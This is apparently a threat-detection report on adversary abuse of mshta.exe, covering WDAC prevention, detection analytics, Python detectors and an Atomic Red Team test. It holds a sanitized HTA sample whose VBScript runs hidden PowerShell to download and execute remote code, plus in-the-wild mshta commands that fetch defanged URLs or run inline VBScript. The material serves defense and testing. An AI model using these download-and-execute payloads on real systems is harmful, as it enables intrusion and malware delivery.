Mshta

After a four-year hiatus, Mshta is back in the top 10, thanks in part to adversaries leveraging a “paste and run” technique for initial access.

#9

overall rank

4.9%

customers affected

384

threats detected

Analysis

Why do adversaries use Mshta?

mshta.exe is a Windows-native binary designed to execute Microsoft HTML Application (HTA) script code. As its full name implies, Mshta can execute Windows Script Host code (VBScript and JScript) embedded within HTML in a network proxy-aware fashion. These capabilities make Mshta an appealing vehicle for adversaries to proxy execution of arbitrary script code through a trusted, signed utility, making it a reliable technique during both initial and later stages of an infection.

Mshta also grants adversaries the flexibility to embed a script payload within any legitimate file format. For example, it is common for adversaries to embed HTA content within legitimate Microsoft binaries (e.g., an embedded HTA payload contained within dialer.exe). They simply append malicious HTA content to the end of the file and mshta.exe scans through the file until it finds valid HTA script content. Adversaries know that a payload is less likely to be initially caught if it is embedded within an otherwise legitimate file.
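Because mshta.exe scans a file for HTA content wherever it sits, a file's extension or magic bytes say nothing about whether it carries a payload. The following is an added Python triage helper, not Red Canary's tooling or mshta's own parser: it searches raw file bytes for the HTA markers an appended payload needs (the hta:application element or a script tag with a language attribute) and flags files that do not start like HTML but contain them. The sample "carrier" is a constructed fake PE prefix with HTA content appended, standing in for the dialer.exe-style samples described above.

```python
import re

# HTA markers an appended payload needs: the <hta:application> element or a
# <script language=...> tag. Matched case-insensitively over raw bytes.
HTA_MARKER_RE = re.compile(rb"(?i)<hta:application|<script\s+language\s*=")


def find_hta_markers(data: bytes) -> list[tuple[int, str]]:
    """Return (offset, marker) pairs for every HTA marker found in the file bytes."""
    return [(m.start(), m.group(0).decode("latin-1").lower())
            for m in HTA_MARKER_RE.finditer(data)]


def is_hta_carrier(data: bytes) -> bool:
    """True when a file that does not look like HTML nevertheless carries HTA content.

    A genuine .hta file starts with HTML from byte 0; a PE, RTF or batch file
    with HTA content appended does not.
    """
    head = data.lstrip()[:8].lower()
    looks_like_html = head.startswith((b"<html", b"<!doctype", b"<head", b"<hta:"))
    return (not looks_like_html) and bool(find_hta_markers(data))


# Constructed sample: a fake PE-like prefix (MZ + padding) with HTA content
# appended at the end, modelled on the "embedded HTA in a legitimate binary" case.
FAKE_PE_PREFIX = b"MZ" + b"\x90" * 512
APPENDED_HTA = (b"<html><head><hta:application id=x></hta:application>"
                b'<script language="VBScript">MsgBox 1</script></head></html>')
SAMPLE_CARRIER = FAKE_PE_PREFIX + APPENDED_HTA
SAMPLE_PLAIN_HTA = APPENDED_HTA   # an ordinary .hta file: HTML from byte 0


if __name__ == "__main__":
    for off, marker in find_hta_markers(SAMPLE_CARRIER):
        print(f"offset {off}: {marker}")
    print("carrier:", is_hta_carrier(SAMPLE_CARRIER),
          "plain hta:", is_hta_carrier(SAMPLE_PLAIN_HTA))
```

Run over a quarantined file's bytes, the offset tells you where the legitimate content ends and the appended HTA begins, which is useful both for carving the script out for analysis and for explaining why mshta.exe was happy to execute a file with a .rtf or .bat extension.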

How do adversaries use Mshta?

There are various methods by which HTA script content can be executed, but adversaries generally prefer the following:

  • inline via an argument passed in the command line to Mshta
  • file-based execution via an HTML Application (HTA) file on disk

Regardless of the method used, adversaries generally embed only enough HTA script content to spawn a subsequent, malicious child process, powershell.exe in most cases.

Here is a sample, sanitized HTA payload based on the following VT sample:

<html>
<head>
<title>Google Reload DNS</title>
<HTA:APPLICATION ID="Google Repair" APPLICATIONNAME="B" BORDER="none" SHOWINTASKBAR="no" SINGLEINSTANCE="yes"
WINDOWSTATE="minimize">
</HTA:APPLICATION>
<script language="VBScript">
Option Explicit:Dim a:Set a=CreateObject("WScript.Shell"):Dim b:b="powershell -NoProfile -ExecutionPolicy Bypass -Command ""
{$U=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('aHR0cHM6Ly9yYXcuZ2l0aHVidXNlcmNvbnRlbnRbLl1jb20vRGFzaW5pU3VtYW5hd2VlcmEvc2lsdmVyLWxhbXAvcmVmcy9oZWFkcy9tYWluL1JFREFDVEVELnR4dA=='))
$C=(Invoke-WebRequest -Uri $U -UseBasicParsing).Content
$B=[scriptblock]::Create($C)
$B}""":a.Run b,0,True:self.close
</script>
</head>
<body></body>
</html>

Additionally, here is a sampling of command-line invocation of mshta.exe commonly seen in the wild:

  • "mshta.exe" hXXps://rebekkaworm[.]snuggleam.org/time.json
  • "mshta.exe" hXXps://pwctrustlaw[.]com/Ray-verify.html
  • "C:\WINDOWS\system32\mshta.exe" hXXps://clicktogo[.]click/downloads/tra10
  • "mshta.exe" "C:\Users\redacteduser\Downloads\QcNezuts8lmKJKw.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
  • "mshta.EXE" vbscript:Execute("CreateObject(""WScript.Shell"").Run ""powershell -ExecutionPolicy Bypass & 'C:\Users\redacteduser\Documents\redacted.ps1'"", 0:close")
  • mshta C:\ProgramData\wBqERTofgffxGgvtPv.rtf

We’ve also observed adversaries leverage mshta.exe to download and execute a malicious payload from a remote resource in the popular “paste and run” technique described in detail in the Initial access section of this report.

Associated threats

Take action

Prevent the execution of HTA script content

When a Windows Defender Application Control (WDAC) policy is deployed, regardless of the configuration and enforcement mode, all HTA execution will be blocked. So even an allow-all policy in audit mode will block HTA execution without blocking execution of any other executables or scripts.

Deploying an allow-all policy is as easy as running the following code from an elevated PowerShell prompt:

ConvertFrom-CIPolicy -XmlFilePath C:\Windows\schemas\CodeIntegrity\ExamplePolicies\AllowAll.xml -BinaryFilePath C:\Windows\System32\CodeIntegrity\SIPolicy.p7b

CiTool.exe -up C:\Windows\System32\CodeIntegrity\SIPolicy.p7b

When WDAC blocks the execution of HTA content, unfortunately, there are no logs to indicate a successful block, so be mindful of this when observing command-line evidence of HTA content. Rest assured, however, that execution will be prevented.

Note, however, that deploying an allow-all policy has a side effect: PowerShell is placed into constrained language mode, which may not be desired without further validation. If that is acceptable, however, constrained language mode by its very nature blocks a significant number of PowerShell-based attacks.

Visibility

Note: The visibility sections in this report are mapped to MITRE ATT&CK data sources and components.

Process and command-line monitoring

Monitoring process execution along with command-line parameters offers defenders visibility into many behaviors associated with malicious abuse of Mshta. Similarly, process lineage is also helpful for detecting adversary use of Mshta. At a minimum, collect parent-child process relationships, and, if possible, consider collecting information about “grandparent” relationships too.

Note: when an mshta.exe command-line invocation ends with {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}, it indicates that mshta.exe was launched interactively by double-clicking an HTA file. The parent process in this case will be explorer.exe.

Network connection monitoring

Monitoring network connections associated with Mshta would reveal any instances where it connected to an external IP or domain.

Detection opportunities

Considering how infrequently Mshta is used for legitimate purposes, suspicious activity is relatively easy to detect by alerting on the following behaviors.

MSHTA spawning from suspect processes

mshta.exe spawning powershell.exe or cmd.exe can be a good indicator of malice. The following pseudo-detector offers a good starting point:

process == 'mshta.exe'
&&
child_process == ('cmd.exe' || 'powershell.exe')

MSHTA spawning from suspicious processes

It’s also suspicious when mshta.exe spawns from any of the following executables:

  • a browser
  • an Office executable
  • w3wp.exe
  • wmiprvse.exe
  • spoolsv.exe

As such, the following analytic offers a good place for security teams to start: 

process == ('w3wp.exe' || 'wmiprvse.exe' || 'spoolsv.exe')
&&
child_process == 'mshta.exe'

Additional detection ideas

  • mshta.exe executing a file on disk that doesn't end with the expected .hta extension; .bat and .rtf are the extensions we commonly see in the wild
  • mshta.exe executing content inline using any of the built-in protocol handlers: JavaScript, VBScript, or About
  • mshta.exe making a network connection to an external domain or IP address
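To show how the two pseudo-detectors above and the additional detection ideas combine over real telemetry, here is an added Python example (not Red Canary's detection logic). It assumes a process-creation record with three fields (image path, command line, parent image path), which is what Sysmon Event ID 1 or an EDR sensor provides; the browser and Office image names in the suspicious-parent list are assumptions for the example, and the sample events are constructed, modelled on the invocations listed earlier in this section. The interactive-launch GUID marker from the Visibility section is reported as context rather than as a finding on its own.

```python
import re
from dataclasses import dataclass

# Child images whose creation under mshta.exe is a strong signal
SCRIPT_HOSTS = {"cmd.exe", "powershell.exe"}
# Parents that should not normally launch mshta.exe. The browser and Office
# image names are assumptions for this example; extend them for your estate.
SUSPICIOUS_PARENTS = {"w3wp.exe", "wmiprvse.exe", "spoolsv.exe",
                      "winword.exe", "excel.exe", "outlook.exe",
                      "chrome.exe", "msedge.exe", "firefox.exe"}
# Marker appended to the command line when an HTA is double-clicked in Explorer
INTERACTIVE_MARKER = ("{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}"
                      "{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}")
PROTOCOL_HANDLER_RE = re.compile(r'^"?(javascript|vbscript|about):', re.I)
URL_RE = re.compile(r'^"?https?://', re.I)
TOKEN_RE = re.compile(r'"([^"]*)"|(\S+)')


@dataclass
class ProcEvent:
    """Constructed process-creation record (the fields Sysmon/EDR sensors expose)."""
    image: str         # full path of the new process image
    cmdline: str       # its command line
    parent_image: str  # full path of the parent's image


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def split_first(cmdline: str) -> tuple[str, str]:
    """Split off the first (possibly double-quoted) token; return (token, rest)."""
    s = cmdline.lstrip()
    m = TOKEN_RE.match(s)
    if not m:
        return "", ""
    tok = m.group(1) if m.group(1) is not None else m.group(2)
    return tok, s[m.end():].strip()


def analyze(ev: ProcEvent) -> list[str]:
    """Return the names of the analytics this event matches (empty if none)."""
    findings = []
    image, parent = basename(ev.image), basename(ev.parent_image)

    # Analytic 1: mshta.exe spawning cmd.exe or powershell.exe
    if image in SCRIPT_HOSTS and parent == "mshta.exe":
        findings.append("mshta_spawns_script_host")
    if image != "mshta.exe":
        return findings

    # Analytic 2: mshta.exe spawned by a web server, WMI, spooler, browser or Office
    if parent in SUSPICIOUS_PARENTS:
        findings.append("mshta_from_suspicious_parent")

    # Command-line analytics: inspect what follows the mshta.exe image token
    _, args = split_first(ev.cmdline)
    if args.endswith(INTERACTIVE_MARKER) and parent == "explorer.exe":
        findings.append("interactive_hta_launch")   # context only, not malice by itself
        args = args[:-len(INTERACTIVE_MARKER)].strip()
    if PROTOCOL_HANDLER_RE.match(args):
        findings.append("mshta_inline_protocol_handler")   # javascript:/vbscript:/about:
    elif URL_RE.match(args):
        findings.append("mshta_remote_url")                 # remote content fetched by mshta
    elif args:
        target, _ = split_first(args)
        if not target.lower().endswith(".hta"):
            findings.append("mshta_unexpected_extension")   # e.g. .bat or .rtf on disk
    return findings


MSHTA = r"C:\Windows\System32\mshta.exe"
# Constructed sample events modelled on the invocations listed above
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell -NoProfile -ExecutionPolicy Bypass -Command ...", MSHTA),
    ProcEvent(MSHTA, r'"mshta.exe" https://example.invalid/time.json',
              r"C:\Program Files\Google\Chrome\Application\chrome.exe"),
    ProcEvent(MSHTA, r'"mshta.exe" "C:\Users\alice\Downloads\invoice.hta" ' + INTERACTIVE_MARKER,
              r"C:\Windows\explorer.exe"),
    ProcEvent(MSHTA, r'"mshta.EXE" vbscript:Execute("MsgBox ""hi"":close")',
              r"C:\Windows\explorer.exe"),
    ProcEvent(MSHTA, r"mshta C:\ProgramData\wBqERTofgffxGgvtPv.rtf",
              r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE"),
    ProcEvent(MSHTA, r'"mshta.exe" "C:\Program Files\Vendor\dashboard.hta"',
              r"C:\Windows\explorer.exe"),   # ordinary launch, no marker, no finding
]


def run_samples() -> list[list[str]]:
    return [analyze(ev) for ev in SAMPLE_EVENTS]


if __name__ == "__main__":
    for ev, hits in zip(SAMPLE_EVENTS, run_samples()):
        print(f"{basename(ev.parent_image)} -> {basename(ev.image)}: {hits or 'no findings'}")
```

Parent and child are evaluated separately because the two analytics fire on different events: the first matches the powershell.exe creation record (whose parent is mshta.exe), the second matches the mshta.exe creation record itself, so the detector needs the parent image on every event rather than a reconstructed process tree. Tune SUSPICIOUS_PARENTS and the .hta allowlist to your environment before alerting on the output.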

Testing

Start testing your defenses against Mshta using Atomic Red Team—an open source testing framework of small, highly portable detection tests mapped to MITRE ATT&CK.

Getting started

View atomic tests for T1218.005: Mshta. In most environments, these should be sufficient to generate a useful signal for defenders.

Run this test on a Windows system using Command Prompt:

mshta.exe "about:<hta:application><script language="VBScript">Close(Execute("CreateObject(""Wscript.Shell"").Run%20""powershell.exe%20-nop%20-Command%20Write-Host%20Hello,%20MSHTA!;Start-Sleep%20-Seconds%205"""))</script>'"

What to expect

mshta.exe will spawn a child powershell.exe process that displays “Hello, MSHTA” to the console.

Useful telemetry

Data source | Telemetry
Process monitoring | An mshta.exe process will start. A powershell.exe process will also start as a child process of mshta.exe.
Process command-line parameters | Command-line logging will capture the context of what is executed.
DLL monitoring | jscript9.dll will load in the mshta.exe process, indicating that script content is being executed. It loads even though the script code is VBScript.

Review and repeat

Now that you have executed one or several common tests and checked for the expected results, it’s useful to answer some immediate questions:

  • Were any of your actions detected?
  • Were any of your actions blocked or prevented?
  • Were your actions visible in logs or other defensive telemetry?

Repeat this process, performing additional tests related to this technique. You can also create and contribute tests of your own.
